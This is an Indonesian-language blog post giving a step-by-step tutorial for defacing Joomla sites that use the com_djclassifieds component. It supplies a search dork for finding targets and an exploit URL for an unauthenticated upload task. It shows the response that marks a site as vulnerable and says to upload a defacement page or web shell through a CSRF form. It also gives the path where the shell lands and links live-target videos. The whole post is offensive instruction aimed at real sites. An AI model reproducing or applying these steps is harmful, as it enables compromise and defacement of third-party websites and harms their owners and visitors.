Deface JOOMLA com_djclassified | Live Target + Upshell
Kamis, 21 November 2019
Tambah Komentar
Joomla Defaced
Dork :
inurl:=com_djclassifieds
*Note : kembangin lagi biar dapet yg vuln
Exploit :
[path]/index.php?option=com_djclassifieds&task=uploa&tmpl=component
CSRF : [Ambil Disini]
1. Dorking Di Mesin Pencarian
Kembangin Dork Di atas Biar Dapat Yg vuln.
Kalo sudah pilih Target Nya.
2. Masukan Exploit Untuk Ngeliat Vuln Atau Tidak nya
Jika vuln Akan Ada Tulisan
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
3. Buka Csrf Nya.
Trus Tinggal Upload Script Deface atau Shell Anda.
Letak Shell di : [path]/tmp/djupload/namashell.php/phtml
Jika Masih Belum Faham. Bisa Liat Video Live Target Nya Di YOUTUBE CHANNEL
https://www.youtube.com/channel/UCbmgddTma6P3nOdGWmzGs9Q
Belum ada Komentar untuk "Deface JOOMLA com_djclassified | Live Target + Upshell"
Posting Komentar